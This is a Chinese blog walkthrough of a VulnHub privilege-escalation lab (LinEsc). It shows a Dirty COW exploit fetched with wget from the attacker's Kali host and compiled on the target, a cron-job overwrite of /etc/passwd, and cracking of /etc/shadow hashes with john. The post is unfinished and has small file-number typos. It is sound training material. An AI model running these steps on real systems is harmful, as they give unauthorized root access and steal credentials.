linux提权(LinEsc)

已于 2022-11-22 08:46:00 修改
阅读量750 收藏 2
点赞数
文章标签: linux 运维 服务器
于 2022-11-11 20:49:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51692662/article/details/127804695
版权

描述

LinEsc是一台旨在演示Linux特权升级的7种最常见方式的机器。

目标:通过7种不同方式获得root特权。

默认凭据:(muhammad:nasef)

靶机下载地址:http://www.vulnhub.com/entry/linesc-1,616/

一、内核版本之脏牛提权

脏牛漏洞影响范围广,如果版本低于下列,很有可能存在此漏洞

entos7 /RHEL7    3.10.0-327.36.3.el7
Cetnos6/RHEL6     2.6.32-642.6.2.el6
Ubuntu 16.10         4.8.0-26.28
Ubuntu 16.04         4.4.0-45.66
Ubuntu 14.04         3.13.0-100.147
Debian 8                3.16.36-1+deb8u2
Debian 7                3.2.82-1

1、查看内核版本

 uname -r

b3b5bc9ade724a6cbd0cb82c560e376a.png

2、然后在exploitdb中搜索合适的利用

searchsploit linux 2.6.24

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTkyMjI3OA==,size_16,color_FFFFFF,t_70

 3、使用脏牛提权,使用exploit-db的exp

    searchsploit linux/local/40839.c -m

在kali本目录看到40893.c文件

 c9cc7728826743e7a43b53ec8521d839.png

 因为在本地kali所以需要靶机用wget传输文件

kali:python开启HTTP服务  python -m SimpleHTTPServer

靶机LinEsc:wget 192.168.127.141/40839.c

a8f572cd82f14beeb999d0c426208294.png

 开启成功

537b15177d4c4f9c916d60ce310a894e.png

 d695d507389e47b8b0554855dafe236c.png

 4、编译,需要自己配置新的密码

 gcc -pthread 40839.c -o dirty -lcrypt

b41902ccf55449b6a167ac020c1678a2.png

 5、账号firefart,输入自己设置的密码

ecb18e9665e741ddb9cf051f501f8aa1.png

 

 二、计划任务提权

Cronjobs是计划的命令和脚本,它们以特定用户的身份在一定时间间隔内自动运行。如果某个脚本以一定的时间间隔以root身份执行,则我们可以修改此脚本。我们可能会得到root shell。

查看计划任务

 cat /etc/crontab

发现系统每一分钟以root权限执行script.sh

f60db59ed00343b5aeeac271d1ef30ad.png

检查脚本的内容后,我们发现它只是复制了passwd文件以替换/ etc / passwd,因此我们只需修改./passwd并添加具有root权限的另一个用户,然后登录即可。

 1ecd16e82466481d9e93fa5d69661716.png

 使用mkpasswd创建密码,也可以使用openssl,python等

14785a1389034f7bacdb58ecb0de3556.png

 并使用我们上面创建的密码修改用户和密码。

5c096bfcc30f43b8a729a679eb897d43.png

等待1分钟,直到脚本执行完毕,这样我们有了一个有root权限的账号

不知道为什么我这里显示——Unknown id 计划任务没有写进去!

三、SUID提权

参考以前写的

写文章-CSDN创作中心

四、权限配置出错

可读 /etc/shadow 

9ec39d8835974a6487a9018c45bfa53b.png

cat /etc/shadow

 8742e8213f5847ce91b7f940fb38c268.png

 将哈希存储在文件中,然后使用rockyou单词表在其中运行john。 用户名

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTkyMjI3OA==,size_16,color_FFFFFF,t_70

靶机玩坏了......

等修复好了再继续提权

 

 

安全~小菜鸡
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux提权方法和工具总结
SHELLCODE_8BIT的博客
10-24 742
主动提权和被动提权1.SUID2.内核漏洞2.3 修改/etc/passwd3.定时任务提权4.sudo滥用提权5.nfs提权6.错误配置7.8.
linux提权辅助工具linux-smart-enumeration(三种工具)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-11 1141
今天讲linux提权辅助工具三种之一的linux-smart-enumeration。 linux-smart-enumeration工具介绍,这个项目的灵感来自 https://github.com/rebootuser/LinEnum 并使用了它的许多测试。与 LinEnum 不同,lse它试图从隐私的角度根据其重要性逐步公开信息。该 shell 脚本将显示有关本地 Linux 系统安全性的相关信息,有助于提升权限。 项目地址:https://github.com/diego-treitos/lin
Linux权限提升总结_linux 提权
最新发布
2401_84968977的博客
05-17 719
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
linux提权
ccssggoo的博客
06-30 3727
linux提权的各种方法
linux提权辅助工具Linux_Exploit_Suggester(三种工具)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-11 2000
今天讲linux提权辅助工具三种之一Linux_Exploit_Suggester。Linux_Exploit_Suggester工具介绍,Linux_Exploit_Suggester是一款根据Linux操作系统版本号自动查找相应提权脚本的工具,旨在帮助检测给定 Linux 内核/基于 Linux 的机器的安全缺陷。 项目地址:https://github.com/mzet-/linux-exploit-suggester 对于工具检测出的每个漏洞,都会计算其存在的可能性: Highly prob
【内网安全】——Linux提权姿势
Demo不是emo的博客
02-08 5441
Linux提权姿势汇总
Linux提权手法总结以及 Linux提权exp集合
02-22
本文将深入探讨Linux提权的常见手法,以及如何防范和应对这些威胁。 首先,内核漏洞提权是最直接也最具破坏性的方式之一。当Linux内核存在安全漏洞时,攻击者可以利用这些漏洞执行恶意代码,从而获得root权限。例如...
权限提升-linux提权手法总结
01-14
权限提升-linux提权手法总结
Linux提权扫描脚本
04-28
这篇文档将深入探讨Linux提权扫描的相关知识点,包括提权原理、常见提权方法、提权扫描脚本的工作机制以及如何编写和使用这样的脚本。 一、提权原理 在Linux系统中,权限分为三类:用户权限、组权限和所有者权限。...
dirtycow脏牛linux提权exp
03-25
这个漏洞利用了Linux内核中的一个内存管理错误,允许本地非特权用户获取root权限,进行权限提升,因此在网络安全领域中被称为“脏牛”提权漏洞。 在Linux操作系统中,Copy-on-Write(COW)是一种内存管理策略,用于...
linux提权用的一个技巧
09-16
一个linux提权用的技巧,放出来全当找工作攒RP了。 OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本
Lampiao 脏牛提权(CVE-2016-5195)
m0_64118193的博客
08-30 815
漏洞编号漏洞名称:脏牛提权漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权,获取root权限影响范围:Linux内核>=2.6.22(2007年发行)开始就受了影响了,直到2016年10月18日才修复链接:靶场下载地址,提取码链接:提权文件下载地址,提权码zp3j。...
Linux提权—脏牛漏洞(CVE-2016-5195)复现
qq_40898302的博客
04-02 1537
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。【影响版本】:该漏洞在全版本Linux系统(Linux kernel >= 2.6.22)均可以实现提权,受影响的镜像版本为:CentOS 5.x 32位/64位CentOS 6.x 32位/64位CentOS 7.x 32位/64位CoreOS 717.3.0 64位。
Linux提权总结全面(自学)
m0_64481831的博客
03-24 981
所谓提权就是指将低权限的账户转换为高权限账户,通过获取高权限账户去做需要高权限才能做的事情。对于Linux内核提权,有一些内核漏洞需要使用到本地用户去提权,有些漏洞可以无视任何权限都可以进行提权
Linux提权辅助工具
LuckySec
04-24 3837
0x01 LinEnum 工具介绍 LinEnum 是一个高级 Bash 脚本,它从目标系统中提取了大量有用的信息,可以复制文件并进行导出,同时可以搜索包含关键字的文件。 项目地址:https://github.com/rebootuser/LinEnum LinEnum 执行的检查/任务的高级摘要: 内核和发行版详细信息 系统信息: 主机名 网络详情 当前IP 默认路由详情 DNS 服务器信息 用户信息: 当前用户详细信息 最后登录的用户
权限提升-Linux系统权限提升篇&内核溢出&辅助项目&Vulnhub&Dirty Pipe&Pwnkit&dirtycow
siu~
03-29 934
1、Web到Linux-内核溢出-权限认知&信息收集 2、Web到Linux-提权项目-漏洞筛选&配置安全 3、Web到Linux-内核溢出-dirtycow(CVE-2016-5159) 4、Web到Linux-内核溢出-Pwnkit (CVE-2021-4034) 5、Web到Linux-内核溢出-DirtyPipe (CVE-2022-0847) 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
LINUX提权入门手册
qq_52988816的博客
02-12 1303
简单介绍一下LINUX提权的大体结构和知识点
提权 - Linux(一)
acepanhuan的博客
03-02 264
提权 - Linux(一)
Linux 提权
qq_53742230的博客
07-17 2162
Linux 的一些常用提权手法
Linux提权tga
01-30
Linux提权tga是指通过利用tga文件中的漏洞来获取root权限。tga文件是一种图像文件格式,而在某些情况下,tga文件中的解析器可能存在漏洞,攻击者可以利用这些漏洞来执行恶意代码并提升权限。 具体的步骤如下: 1. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值